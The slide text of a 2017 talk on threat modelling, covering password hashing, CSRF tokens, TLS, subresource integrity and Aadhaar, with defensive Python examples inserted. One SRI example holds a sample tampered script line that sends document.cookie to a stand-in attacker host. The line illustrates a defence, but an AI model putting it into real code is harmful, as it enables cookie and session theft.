Slide 1

Slide 1 text

IT'S THE THREAT MODEL, SILLY! #INCLUDE | GO-JEK | MAY 2017 AKASH MAHAJAN - DIRECTOR APPSECCO

Slide 2

Slide 2 text

WHAT IS A THREAT MODEL? WHAT EXACTLY IS A THREAT MODEL?

Slide 3

Slide 3 text

MODEL REAL MODEL REAL

Slide 4

Slide 4 text

IN COMPUTER SECURITY A THREAT IS A POSSIBLE DANGER THAT MIGHT EXPLOIT A VULNERABILITY TO BREACH SECURITY AND THEREFORE CAUSE POSSIBLE HARM. From Wikipedia for Threat (Computer) CONTROL THREAT

Slide 5

Slide 5 text

THREATS CAN BE INTENTIONAL ACCIDENTAL FIRES QUAKE STORM FLOOD

Slide 6

Slide 6 text

AND SOMETIMES…

Slide 7

Slide 7 text

THREAT MODELLING IS A CONCEPTUAL MODEL FOCUSSING ON DATA FLOW MODELLING Mostly from Wikipedia

Slide 8

Slide 8 text

DATA FLOW DIAGRAMS CREATED WITH A FEW PRIMITIVES

Slide 9

Slide 9 text

A GOOD WAY TO CONSUME DATA IS WITH LISTS

Slide 10

Slide 10 text

FOR THREAT MODELLING, THESE ARE THE LISTS WE SHOULD HAVE ✓Assets ✓Endpoints ✓External Dependencies ✓Trust Levels ✓and Data Flow Diagrams

Slide 11

Slide 11 text

ASSETS What is it that we need to protect?

Slide 12

Slide 12 text

ENDPOINTS What are the ways someone will interact with the system?

Slide 13

Slide 13 text

EXTERNAL DEPENDENCIES What does the system need to operate?

Slide 14

Slide 14 text

TRUST LEVELS What are the varying degrees of trust between the parties in the interaction?

Slide 15

Slide 15 text

DATA FLOW DIAGRAMS What are the various ways data will flow in the system?
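The five lists on slides 10 to 15 can be derived from one another once the data flow diagram exists. The following is an added example, not part of the talk: a constructed model of a small payments service (all element names, trust levels and flows are made up) that holds the DFD as data, extracts the asset, endpoint, external-dependency and trust-level lists from it, and flags the flows that cross a trust boundary, which is where the questions on the following slides apply.

```python
from dataclasses import dataclass

# Constructed example model; none of these names or values come from the slides.

@dataclass(frozen=True)
class Element:
    name: str
    trust: int            # trust level: 0 = anonymous internet, higher = more trusted
    external: bool = False  # True for an external dependency we do not operate

@dataclass(frozen=True)
class Flow:
    src: Element
    dst: Element
    data: str             # what moves along this edge of the DFD
    assets: frozenset     # names of the assets carried on this flow

BROWSER = Element("customer browser", 0)
SMS_GATEWAY = Element("SMS gateway", 1, external=True)
API = Element("payments API", 2)
WORKER = Element("settlement worker", 2)
DB = Element("accounts database", 3)

FLOWS = [
    Flow(BROWSER, API, "login form", frozenset({"password"})),
    Flow(API, DB, "credential lookup", frozenset({"password_hash"})),
    Flow(DB, API, "account record", frozenset({"pii", "balance"})),
    Flow(API, SMS_GATEWAY, "one-time password", frozenset({"otp"})),
    Flow(API, BROWSER, "session cookie", frozenset({"session"})),
    Flow(API, WORKER, "settlement job", frozenset({"balance"})),
]

def inventory(flows):
    """Build the four 'lists' of slide 10 straight from the data flows.
    Endpoints are taken to be the flows that originate at trust level 0,
    i.e. the ways an outside party can talk to the system."""
    elements = {f.src for f in flows} | {f.dst for f in flows}
    return {
        "assets": sorted(set().union(*(f.assets for f in flows))),
        "endpoints": sorted(f.data for f in flows if f.src.trust == 0),
        "external_dependencies": sorted(e.name for e in elements if e.external),
        "trust_levels": sorted({e.trust for e in elements}),
        "flows": len(flows),
    }

def boundary_crossings(flows):
    """Flows whose endpoints sit at different trust levels. Inbound (low -> high)
    flows need authentication and input validation; outbound (high -> low) flows
    need to avoid disclosing more than the receiver is trusted with."""
    crossings = []
    for f in flows:
        if f.src.trust < f.dst.trust:
            crossings.append((f, "inbound"))
        elif f.src.trust > f.dst.trust:
            crossings.append((f, "outbound"))
    return crossings

def lowest_trust_reached(flows):
    """For each asset, the least trusted element that ever handles it.
    An asset that reaches trust 0 is exposed to anyone on the internet; one that
    reaches an external dependency is only as safe as that third party."""
    reach = {}
    for f in flows:
        edge_min = min(f.src.trust, f.dst.trust)
        for asset in f.assets:
            reach[asset] = min(reach.get(asset, edge_min), edge_min)
    return reach

if __name__ == "__main__":
    print(inventory(FLOWS))
    for flow, direction in boundary_crossings(FLOWS):
        print(f"{direction:8} {flow.src.name} -> {flow.dst.name}: {flow.data}")
    print(lowest_trust_reached(FLOWS))
```

Running it shows the one-time password reaching the external SMS gateway at trust level 1, which is exactly the kind of exposure slide 28 describes; the model makes that visible before any control is discussed.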

Slide 16

Slide 16 text

THREAT MODELLING 101 - MAZAA EDITION

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

EVERYTHING THAT IS RELATED TO SECURITY DEFENCE HAS TO BE LOOKED AT FROM THE POINT OF VIEW OF A THREAT MODEL Our Assertion

Slide 19

Slide 19 text

LET'S LOOK AT SOME OF THE SECURITY CONTROLS FROM THE POINT OF VIEW OF THREAT MODELLING

Slide 20

Slide 20 text

PASSWORDS ▸ Why do we want to store passwords in a non-reversible manner? ▸ Why do we want to use a per-password salt? ▸ Why do we want to slow down the rate at which hashes can be calculated?
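Each of the three questions answers a threat against a stolen credential database: an attacker who has the table must not recover plaintext (non-reversible), must not be able to attack all users with one precomputed table or spot reused passwords (per-password salt), and must pay a real cost per guess (slow hash). The following is an added example, not code from the talk, showing an unsalted fast hash next to a salted, deliberately slow scrypt record (using Python's standard library; the record format and cost parameters are this example's own choice).

```python
import base64
import hashlib
import hmac
import os
import time

# scrypt cost parameters chosen for this example: N (CPU/memory cost), r (block size),
# p (parallelism). 2**14 / 8 / 1 needs about 16 MiB per hash; raise N as hardware gets faster.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
SALT_BYTES = 16

def unsalted_hash(password: str) -> str:
    """Non-reversible but unsalted and fast: identical passwords give identical
    hashes, so one precomputed table (or one cracked hash) covers every user
    who chose that password."""
    return hashlib.sha256(password.encode()).hexdigest()

def hash_password(password: str) -> str:
    """Per-password random salt plus a memory-hard, slow KDF. The record carries
    its own parameters so the cost can be raised later without breaking old rows."""
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "scrypt${}${}${}${}${}".format(
        SCRYPT_N, SCRYPT_R, SCRYPT_P,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and parameters; compare in constant time.
    Any malformed record is treated as a failed login rather than an exception."""
    try:
        scheme, n, r, p, salt_b64, digest_b64 = stored.split("$")
        if scheme != "scrypt":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        actual = hashlib.scrypt(password.encode(), salt=salt,
                                n=int(n), r=int(r), p=int(p), dklen=len(expected))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(actual, expected)

def guesses_per_second(stored: str, samples: int = 5) -> float:
    """Rough measure of how many candidates a single core can try against one
    record on this machine; the slow KDF is what keeps this number small."""
    start = time.perf_counter()
    for i in range(samples):
        verify_password(f"guess-{i}", stored)
    return samples / (time.perf_counter() - start)

if __name__ == "__main__":
    # Constructed sample passwords; same password, two users.
    print("unsalted, user A:", unsalted_hash("correct horse"))
    print("unsalted, user B:", unsalted_hash("correct horse"))  # identical: reuse is visible
    rec_a, rec_b = hash_password("correct horse"), hash_password("correct horse")
    print("salted,   user A:", rec_a)
    print("salted,   user B:", rec_b)                           # differ: salt per password
    print("verify ok:", verify_password("correct horse", rec_a))
    print("guesses/s:", round(guesses_per_second(rec_a)))
```

The scrypt work factor is a tuning decision, not a constant: measure guesses per second on the attacker's hardware you care about, not only on your login servers.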

Slide 21

Slide 21 text

CSRF TOKEN ▸ Why do we need a CSRF token? ▸ Why do we need to ensure that we can check the origin of a request?
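The threat a CSRF token answers is a page on another origin making the victim's browser submit a state-changing request with the victim's cookies attached; the token works because the other origin cannot read a value bound to the victim's session, and the origin check works because the browser, not the attacker, sets the Origin and Referer headers. The following is an added example, not code from the talk, with a session-bound token and an origin check applied to constructed requests (the request dict shape, header names used and site origin are this example's assumptions, not any framework's API).

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed server-side secret; a real deployment loads this from a secret store.
SERVER_SECRET = secrets.token_bytes(32)

def csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token derived from the session. A page on another origin cannot read the
    victim's session cookie, so it cannot compute this value to put in its form."""
    return hmac.new(secret, b"csrf:" + session_id.encode(), hashlib.sha256).hexdigest()

def token_valid(session_id: str, submitted, secret: bytes = SERVER_SECRET) -> bool:
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), submitted)

def origin_allowed(headers: dict, site_origin: str) -> bool:
    """Browsers send Origin on cross-site POSTs (and Referer on most requests).
    Compare scheme + host + port only. Reject when neither header is present or
    Origin is the literal 'null' (sandboxed frames, some redirects): a same-origin
    form post from a current browser always carries one of them."""
    lower = {k.lower(): v for k, v in headers.items()}
    source = lower.get("origin") or lower.get("referer")
    if not source or source == "null":
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == site_origin

def accept_state_change(request: dict, site_origin: str) -> bool:
    """Both checks must pass: origin check first (cheap, catches most forgeries),
    then the token bound to the session the cookie identifies."""
    return (origin_allowed(request["headers"], site_origin)
            and token_valid(request["session_id"], request["form"].get("csrf_token")))

# Constructed sample requests against a hypothetical site https://shop.example.
SITE = "https://shop.example"
VICTIM_SESSION = "sess-7f3a"            # value the victim's cookie resolves to

LEGIT = {"session_id": VICTIM_SESSION,
         "headers": {"Origin": SITE},
         "form": {"amount": "100", "csrf_token": csrf_token(VICTIM_SESSION)}}

# Attacker's page: browser attaches the victim's cookie, but the attacker can only
# supply a token for a session they control and the browser sets Origin to their site.
FORGED = {"session_id": VICTIM_SESSION,
          "headers": {"Origin": "https://evil.example"},
          "form": {"amount": "100", "csrf_token": csrf_token("sess-attacker")}}

if __name__ == "__main__":
    print("legit accepted:", accept_state_change(LEGIT, SITE))
    print("forged accepted:", accept_state_change(FORGED, SITE))
```

Checking origin alone is not enough where a proxy strips headers or an old client omits them, and the token alone does not help when the token leaks through a cross-origin read; the two controls cover different parts of the same threat model, which is why the slide asks for both.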

Slide 22

Slide 22 text

SSL/TLS ▸ How does the browser know that it can trust the initial certificate from the server?

Slide 23

Slide 23 text

SUBRESOURCE INTEGRITY ▸ How does SRI help us stay safe?
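The threat SRI answers is a third party (a CDN, or whoever compromises it) serving a different script from the one the page author reviewed: the page pins the expected hash, and the browser refuses to execute anything that does not match. The following is an added example, not code from the talk, that computes an integrity attribute for a constructed script body and checks fetched bytes against it the way a browser does, including the rule that only the strongest listed algorithm counts (sample content and URL are made up).

```python
import base64
import hashlib
import hmac

# Algorithms SRI accepts, ordered weakest to strongest.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")

def integrity_attribute(content: bytes, alg: str = "sha384") -> str:
    """Value for the integrity="" attribute: '<alg>-<base64 digest>'."""
    if alg not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {alg}")
    digest = hashlib.new(alg, content).digest()
    return f"{alg}-{base64.b64encode(digest).decode()}"

def script_tag(url: str, content: bytes) -> str:
    """crossorigin='anonymous' is needed for cross-origin scripts so the browser
    is allowed to read the response body and hash it."""
    return (f'<script src="{url}" integrity="{integrity_attribute(content)}" '
            f'crossorigin="anonymous"></script>')

def sri_matches(content: bytes, integrity: str) -> bool:
    """Mirror the browser's matching rules: split on whitespace, drop any
    '?options' suffix, ignore unknown algorithms, keep only the hashes for the
    strongest algorithm present, and accept if the content matches any of them.
    Difference from a browser: with no usable metadata a browser loads the resource
    as if no integrity were given; this build-time check fails closed instead."""
    parsed = []
    for token in integrity.split():
        token = token.split("?", 1)[0]
        alg, sep, b64 = token.partition("-")
        if sep and alg in SRI_ALGORITHMS and b64:
            parsed.append((alg, b64))
    if not parsed:
        return False
    strongest = max(alg for alg, _ in parsed)
    strongest = max((alg for alg, _ in parsed), key=SRI_ALGORITHMS.index)
    candidates = [b64 for alg, b64 in parsed if alg == strongest]
    actual = base64.b64encode(hashlib.new(strongest, content).digest()).decode()
    return any(hmac.compare_digest(actual, c) for c in candidates)

# Constructed sample script as reviewed by the page author.
REVIEWED = b"window.pay = function (amount) { return post('/charge', amount); };"
# What a tampered CDN might serve instead: same behaviour plus an exfiltration call.
TAMPERED = REVIEWED + b" post('https://evil.example/steal', document.cookie);"

if __name__ == "__main__":
    tag = script_tag("https://cdn.example/pay.js", REVIEWED)
    attr = integrity_attribute(REVIEWED)
    print(tag)
    print("reviewed matches:", sri_matches(REVIEWED, attr))
    print("tampered matches:", sri_matches(TAMPERED, attr))
```

SRI only helps for content you can pin: a script that legitimately changes on every deploy needs the attribute regenerated as part of that deploy, or the control silently becomes a reason to remove it.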

Slide 24

Slide 24 text

YOUR FAVOURITE CONTROL ▸ Let's add some questions about it, to understand the threat model it was created for

Slide 25

Slide 25 text

CONTROL MOVIE THREAT REAL THREAT

Slide 26

Slide 26 text

SOMETIMES SECURITY CONTROLS INTRODUCE NEW ATTACK SURFACE Heard of Certificate Transparency logs?

Slide 27

Slide 27 text

WITHOUT "CONTEXT" SECURITY CONTROLS WILL NOT DO WHAT WE "HOPE" THEY SHOULD DO It is essential that we understand the basic threat model for which a control was envisioned, designed and implemented

Slide 28

Slide 28 text

AADHAAR ENABLED PAYMENT SYSTEMS + ONE TIME PASSWORDS ▸ Why does this pose problems? ▸ The things that the architects maybe didn't think about ▸ Rogue merchants can modify apps on the mobile point-of-sale device to store fingerprints ▸ GSM and mobile networks can allow sniffing of SMS text messages

Slide 29

Slide 29 text

FOR AND AGAINST AADHAAR ▸ Assets: UIDAI can't figure out what is worth stealing ▸ External dependencies: UIDAI feels that the leakage of information is not at its end, so it is not responsible ▸ Trust levels: UIDAI believes that all bankers and telcos can be trusted with sensitive data ▸ Endpoints: There is no easy way to figure out what is an official channel and what is a private channel for sharing data

Slide 30

Slide 30 text

SO IN A WAY BOTH POINTS OF VIEW ARE RIGHT

Slide 31

Slide 31 text

SCOPE CREEP - HAPPENS TO ALL THINGS THAT WORK, INCLUDING THE INTERNET • All working systems are afflicted by scope creep: they are asked to take on functions they were not designed for. Every such function adds • Assets worth stealing • Endpoints worth investigating • External dependencies that may be insecure • Trust levels that are not thoroughly vetted • Data flows that never get mapped

Slide 32

Slide 32 text

IT’S THE THREAT MODEL, SILLY!

Slide 33

Slide 33 text

THAT APPLICATION SECURITY GUY

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

QUESTIONS @makash | https://linkd.in/webappsecguy | [email protected]